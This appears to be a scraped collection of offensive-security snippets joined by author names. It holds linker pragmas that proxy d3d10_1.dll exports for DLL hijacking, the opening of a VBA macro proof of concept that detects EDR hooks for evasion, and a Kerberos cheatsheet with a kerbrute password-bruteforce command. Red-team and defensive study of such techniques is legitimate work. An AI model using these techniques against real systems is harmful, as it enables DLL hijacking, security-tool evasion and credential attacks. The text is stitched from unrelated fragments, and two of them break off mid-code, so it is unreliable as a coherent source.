tamir-white-hat

#pragma comment(linker,"/export:D3D10CompileEffectFromMemory=d3d10_1_orig.D3D10CompileEffectFromMemory,@1")
#pragma comment(linker,"/export:D3D10CompileShader=d3d10_1_orig.D3D10CompileShader,@2")
#pragma comment(linker,"/export:D3D10CreateBlob=d3d10_1_orig.D3D10CreateBlob,@3")
#pragma comment(linker,"/export:D3D10CreateDevice1=d3d10_1_orig.D3D10CreateDevice1,@4")
#pragma comment(linker,"/export:D3D10CreateDeviceAndSwapChain1=d3d10_1_orig.D3D10CreateDeviceAndSwapChain1,@5")
#pragma comment(linker,"/export:D3D10CreateEffectFromMemory=d3d10_1_orig.D3D10CreateEffectFromMemory,@6")
#pragma comment(linker,"/export:D3D10CreateEffectPoolFromMemory=d3d10_1_orig.D3D10CreateEffectPoolFromMemory,@7")
#pragma comment(linker,"/export:D3D10CreateStateBlock=d3d10_1_orig.D3D10CreateStateBlock,@8")
#pragma comment(linker,"/export:D3D10DisassembleEffect=d3d10_1_orig.D3D10DisassembleEffect,@9")
#pragma comment(linker,"/export:D3D10DisassembleShader=d3d10_1_orig.D3D10DisassembleShader,@10")

X-C3LL

Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long)

'VBA Macro that detects hooks made by EDRs
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa)


Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer
    Dim address As LongPtr

TarlogicSecurity

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module: